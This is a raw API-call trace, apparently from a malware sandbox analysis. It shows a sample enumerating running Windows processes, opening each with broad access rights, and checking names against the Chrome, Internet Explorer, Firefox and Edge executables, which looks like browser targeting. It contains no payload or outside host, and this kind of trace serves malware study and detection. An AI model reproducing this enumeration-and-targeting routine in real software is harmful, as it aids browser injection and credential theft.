	[0201.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0201.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1e94
	[0201.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.187] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0201.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.187] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.188] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0201.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.188] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.188] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1e98
	[0201.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.189] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.190] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.190] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.190] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.190] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0201.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e9c
	[0201.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.191] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0201.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.192] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.192] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0201.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.192] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0201.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1ea0
	[0201.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.193] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0201.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.194] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.194] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0201.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.195] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.195] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0201.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1ea4
	[0201.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.196] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0201.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.196] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.196] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0201.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.197] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0201.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1ea8
	[0201.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.198] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.198] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.198] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.198] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1eac
	[0201.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.199] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.200] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.200] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.200] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.200] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1eb0
	[0201.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.201] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.202] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.202] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.202] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1eb4
	[0201.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.203] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.204] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.204] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1eb8
	[0201.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.205] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.205] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.206] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.206] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1ebc
	[0201.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.208] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1ec0
	[0201.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.210] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.211] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.211] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1ec4
	[0201.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.212] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.212] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.212] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.213] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0201.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1ec8
	[0201.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.214] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0201.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.214] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.214] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0201.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.215] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.215] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1ecc
	[0201.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.216] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.216] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.216] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.217] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.217] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0201.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1ed0
	[0201.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.218] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.218] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.218] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.218] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1ed4
	[0201.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.219] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.221] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.221] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1ed8
	[0201.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.222] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.223] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.223] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.223] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.223] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0201.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1edc
	[0201.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.224] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0201.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.224] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.225] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0201.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.226] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.226] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0201.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1ee0
	[0201.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.227] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0201.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.227] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.227] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0201.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.227] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.228] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0201.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1ee4
	[0201.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.228] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.229] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.229] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.229] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.229] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0201.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1ee8
	[0201.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.230] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0201.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.230] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.231] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0201.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.231] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.231] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0201.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0201.232] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0201.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1eec
	[0201.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.233] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0201.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.233] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.234] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0201.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.234] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.235] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0201.236] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1ef0
	[0201.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.236] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0201.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.236] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.236] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0201.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.237] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.237] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0201.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1ef4
	[0201.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.238] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
